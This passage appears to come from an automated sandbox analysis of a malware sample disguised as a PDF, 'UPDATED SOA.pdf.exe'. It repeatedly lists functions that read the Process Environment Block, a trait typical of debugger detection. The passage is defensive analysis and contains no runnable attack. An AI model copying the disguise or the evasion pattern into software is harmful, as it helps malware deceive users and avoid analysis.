                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F674D mov eax, dword ptr fs:[00000030h]9_2_014F674D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154E75D mov eax, dword ptr fs:[00000030h]9_2_0154E75D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C0750 mov eax, dword ptr fs:[00000030h]9_2_014C0750
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8770 mov eax, dword ptr fs:[00000030h]9_2_014C8770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]9_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]9_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]9_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]9_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]9_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]9_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]9_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]9_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]9_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]9_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]9_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]9_2_014D0770
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FC700 mov eax, dword ptr fs:[00000030h]9_2_014FC700
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C0710 mov eax, dword ptr fs:[00000030h]9_2_014C0710
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F0710 mov eax, dword ptr fs:[00000030h]9_2_014F0710
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153C730 mov eax, dword ptr fs:[00000030h]9_2_0153C730
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FC720 mov eax, dword ptr fs:[00000030h]9_2_014FC720
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FC720 mov eax, dword ptr fs:[00000030h]9_2_014FC720
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F273C mov eax, dword ptr fs:[00000030h]9_2_014F273C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F273C mov ecx, dword ptr fs:[00000030h]9_2_014F273C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F273C mov eax, dword ptr fs:[00000030h]9_2_014F273C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CC7C0 mov eax, dword ptr fs:[00000030h]9_2_014CC7C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015407C3 mov eax, dword ptr fs:[00000030h]9_2_015407C3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E27ED mov eax, dword ptr fs:[00000030h]9_2_014E27ED
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E27ED mov eax, dword ptr fs:[00000030h]9_2_014E27ED
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E27ED mov eax, dword ptr fs:[00000030h]9_2_014E27ED
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154E7E1 mov eax, dword ptr fs:[00000030h]9_2_0154E7E1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C47FB mov eax, dword ptr fs:[00000030h]9_2_014C47FB
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C47FB mov eax, dword ptr fs:[00000030h]9_2_014C47FB
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156678E mov eax, dword ptr fs:[00000030h]9_2_0156678E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C07AF mov eax, dword ptr fs:[00000030h]9_2_014C07AF
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015747A0 mov eax, dword ptr fs:[00000030h]9_2_015747A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DC640 mov eax, dword ptr fs:[00000030h]9_2_014DC640
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FA660 mov eax, dword ptr fs:[00000030h]9_2_014FA660
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FA660 mov eax, dword ptr fs:[00000030h]9_2_014FA660
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158866E mov eax, dword ptr fs:[00000030h]9_2_0158866E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158866E mov eax, dword ptr fs:[00000030h]9_2_0158866E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F2674 mov eax, dword ptr fs:[00000030h]9_2_014F2674
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]9_2_014D260B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]9_2_014D260B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]9_2_014D260B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]9_2_014D260B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]9_2_014D260B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]9_2_014D260B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]9_2_014D260B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502619 mov eax, dword ptr fs:[00000030h]9_2_01502619
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153E609 mov eax, dword ptr fs:[00000030h]9_2_0153E609
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C262C mov eax, dword ptr fs:[00000030h]9_2_014C262C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DE627 mov eax, dword ptr fs:[00000030h]9_2_014DE627
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F6620 mov eax, dword ptr fs:[00000030h]9_2_014F6620
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F8620 mov eax, dword ptr fs:[00000030h]9_2_014F8620
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FA6C7 mov ebx, dword ptr fs:[00000030h]9_2_014FA6C7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FA6C7 mov eax, dword ptr fs:[00000030h]9_2_014FA6C7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153E6F2 mov eax, dword ptr fs:[00000030h]9_2_0153E6F2
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153E6F2 mov eax, dword ptr fs:[00000030h]9_2_0153E6F2
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153E6F2 mov eax, dword ptr fs:[00000030h]9_2_0153E6F2
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153E6F2 mov eax, dword ptr fs:[00000030h]9_2_0153E6F2
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015406F1 mov eax, dword ptr fs:[00000030h]9_2_015406F1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015406F1 mov eax, dword ptr fs:[00000030h]9_2_015406F1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C4690 mov eax, dword ptr fs:[00000030h]9_2_014C4690
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C4690 mov eax, dword ptr fs:[00000030h]9_2_014C4690
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FC6A6 mov eax, dword ptr fs:[00000030h]9_2_014FC6A6
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F66B0 mov eax, dword ptr fs:[00000030h]9_2_014F66B0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01540946 mov eax, dword ptr fs:[00000030h]9_2_01540946
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154C97C mov eax, dword ptr fs:[00000030h]9_2_0154C97C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E6962 mov eax, dword ptr fs:[00000030h]9_2_014E6962
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E6962 mov eax, dword ptr fs:[00000030h]9_2_014E6962
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E6962 mov eax, dword ptr fs:[00000030h]9_2_014E6962
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01564978 mov eax, dword ptr fs:[00000030h]9_2_01564978
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01564978 mov eax, dword ptr fs:[00000030h]9_2_01564978
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0150096E mov eax, dword ptr fs:[00000030h]9_2_0150096E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0150096E mov edx, dword ptr fs:[00000030h]9_2_0150096E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0150096E mov eax, dword ptr fs:[00000030h]9_2_0150096E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154C912 mov eax, dword ptr fs:[00000030h]9_2_0154C912
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014B8918 mov eax, dword ptr fs:[00000030h]9_2_014B8918
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014B8918 mov eax, dword ptr fs:[00000030h]9_2_014B8918
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153E908 mov eax, dword ptr fs:[00000030h]9_2_0153E908
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153E908 mov eax, dword ptr fs:[00000030h]9_2_0153E908
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154892A mov eax, dword ptr fs:[00000030h]9_2_0154892A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0155892B mov eax, dword ptr fs:[00000030h]9_2_0155892B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158A9D3 mov eax, dword ptr fs:[00000030h]9_2_0158A9D3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015569C0 mov eax, dword ptr fs:[00000030h]9_2_015569C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA9D0 mov eax, dword ptr fs:[00000030h]9_2_014CA9D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA9D0 mov eax, dword ptr fs:[00000030h]9_2_014CA9D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA9D0 mov eax, dword ptr fs:[00000030h]9_2_014CA9D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA9D0 mov eax, dword ptr fs:[00000030h]9_2_014CA9D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA9D0 mov eax, dword ptr fs:[00000030h]9_2_014CA9D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA9D0 mov eax, dword ptr fs:[00000030h]9_2_014CA9D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F49D0 mov eax, dword ptr fs:[00000030h]9_2_014F49D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154E9E0 mov eax, dword ptr fs:[00000030h]9_2_0154E9E0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F29F9 mov eax, dword ptr fs:[00000030h]9_2_014F29F9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F29F9 mov eax, dword ptr fs:[00000030h]9_2_014F29F9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C09AD mov eax, dword ptr fs:[00000030h]9_2_014C09AD
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C09AD mov eax, dword ptr fs:[00000030h]9_2_014C09AD
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015489B3 mov esi, dword ptr fs:[00000030h]9_2_015489B3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015489B3 mov eax, dword ptr fs:[00000030h]9_2_015489B3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015489B3 mov eax, dword ptr fs:[00000030h]9_2_015489B3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]9_2_014D29A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D2840 mov ecx, dword ptr fs:[00000030h]9_2_014D2840
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C4859 mov eax, dword ptr fs:[00000030h]9_2_014C4859
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C4859 mov eax, dword ptr fs:[00000030h]9_2_014C4859
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F0854 mov eax, dword ptr fs:[00000030h]9_2_014F0854
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01556870 mov eax, dword ptr fs:[00000030h]9_2_01556870
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01556870 mov eax, dword ptr fs:[00000030h]9_2_01556870
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154E872 mov eax, dword ptr fs:[00000030h]9_2_0154E872
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154E872 mov eax, dword ptr fs:[00000030h]9_2_0154E872
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154C810 mov eax, dword ptr fs:[00000030h]9_2_0154C810
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156483A mov eax, dword ptr fs:[00000030h]9_2_0156483A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156483A mov eax, dword ptr fs:[00000030h]9_2_0156483A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E2835 mov eax, dword ptr fs:[00000030h]9_2_014E2835
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E2835 mov eax, dword ptr fs:[00000030h]9_2_014E2835
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E2835 mov eax, dword ptr fs:[00000030h]9_2_014E2835
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E2835 mov ecx, dword ptr fs:[00000030h]9_2_014E2835
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E2835 mov eax, dword ptr fs:[00000030h]9_2_014E2835
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E2835 mov eax, dword ptr fs:[00000030h]9_2_014E2835
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FA830 mov eax, dword ptr fs:[00000030h]9_2_014FA830
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE8C0 mov eax, dword ptr fs:[00000030h]9_2_014EE8C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FC8F9 mov eax, dword ptr fs:[00000030h]9_2_014FC8F9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FC8F9 mov eax, dword ptr fs:[00000030h]9_2_014FC8F9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158A8E4 mov eax, dword ptr fs:[00000030h]9_2_0158A8E4
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154C89D mov eax, dword ptr fs:[00000030h]9_2_0154C89D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C0887 mov eax, dword ptr fs:[00000030h]9_2_014C0887
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156EB50 mov eax, dword ptr fs:[00000030h]9_2_0156EB50
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01568B42 mov eax, dword ptr fs:[00000030h]9_2_01568B42
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01556B40 mov eax, dword ptr fs:[00000030h]9_2_01556B40
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01556B40 mov eax, dword ptr fs:[00000030h]9_2_01556B40
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158AB40 mov eax, dword ptr fs:[00000030h]9_2_0158AB40
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01574B4B mov eax, dword ptr fs:[00000030h]9_2_01574B4B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01574B4B mov eax, dword ptr fs:[00000030h]9_2_01574B4B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BCB7E mov eax, dword ptr fs:[00000030h]9_2_014BCB7E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]9_2_0153EB1D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]9_2_0153EB1D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]9_2_0153EB1D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]9_2_0153EB1D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]9_2_0153EB1D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]9_2_0153EB1D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]9_2_0153EB1D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]9_2_0153EB1D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]9_2_0153EB1D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EEB20 mov eax, dword ptr fs:[00000030h]9_2_014EEB20
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EEB20 mov eax, dword ptr fs:[00000030h]9_2_014EEB20
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01588B28 mov eax, dword ptr fs:[00000030h]9_2_01588B28
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01588B28 mov eax, dword ptr fs:[00000030h]9_2_01588B28
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C0BCD mov eax, dword ptr fs:[00000030h]9_2_014C0BCD
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C0BCD mov eax, dword ptr fs:[00000030h]9_2_014C0BCD
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C0BCD mov eax, dword ptr fs:[00000030h]9_2_014C0BCD
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E0BCB mov eax, dword ptr fs:[00000030h]9_2_014E0BCB
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E0BCB mov eax, dword ptr fs:[00000030h]9_2_014E0BCB
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E0BCB mov eax, dword ptr fs:[00000030h]9_2_014E0BCB
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156EBD0 mov eax, dword ptr fs:[00000030h]9_2_0156EBD0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154CBF0 mov eax, dword ptr fs:[00000030h]9_2_0154CBF0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EEBFC mov eax, dword ptr fs:[00000030h]9_2_014EEBFC
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8BF0 mov eax, dword ptr fs:[00000030h]9_2_014C8BF0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8BF0 mov eax, dword ptr fs:[00000030h]9_2_014C8BF0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8BF0 mov eax, dword ptr fs:[00000030h]9_2_014C8BF0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01574BB0 mov eax, dword ptr fs:[00000030h]9_2_01574BB0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01574BB0 mov eax, dword ptr fs:[00000030h]9_2_01574BB0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0BBE mov eax, dword ptr fs:[00000030h]9_2_014D0BBE
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0BBE mov eax, dword ptr fs:[00000030h]9_2_014D0BBE
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0A5B mov eax, dword ptr fs:[00000030h]9_2_014D0A5B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0A5B mov eax, dword ptr fs:[00000030h]9_2_014D0A5B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]9_2_014C6A50
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]9_2_014C6A50
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]9_2_014C6A50
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]9_2_014C6A50
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]9_2_014C6A50
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]9_2_014C6A50
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]9_2_014C6A50
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FCA6F mov eax, dword ptr fs:[00000030h]9_2_014FCA6F
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FCA6F mov eax, dword ptr fs:[00000030h]9_2_014FCA6F
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FCA6F mov eax, dword ptr fs:[00000030h]9_2_014FCA6F
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153CA72 mov eax, dword ptr fs:[00000030h]9_2_0153CA72
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153CA72 mov eax, dword ptr fs:[00000030h]9_2_0153CA72
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156EA60 mov eax, dword ptr fs:[00000030h]9_2_0156EA60
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154CA11 mov eax, dword ptr fs:[00000030h]9_2_0154CA11
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EEA2E mov eax, dword ptr fs:[00000030h]9_2_014EEA2E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FCA24 mov eax, dword ptr fs:[00000030h]9_2_014FCA24
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E4A35 mov eax, dword ptr fs:[00000030h]9_2_014E4A35
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E4A35 mov eax, dword ptr fs:[00000030h]9_2_014E4A35
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C0AD0 mov eax, dword ptr fs:[00000030h]9_2_014C0AD0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01516ACC mov eax, dword ptr fs:[00000030h]9_2_01516ACC
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01516ACC mov eax, dword ptr fs:[00000030h]9_2_01516ACC
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01516ACC mov eax, dword ptr fs:[00000030h]9_2_01516ACC
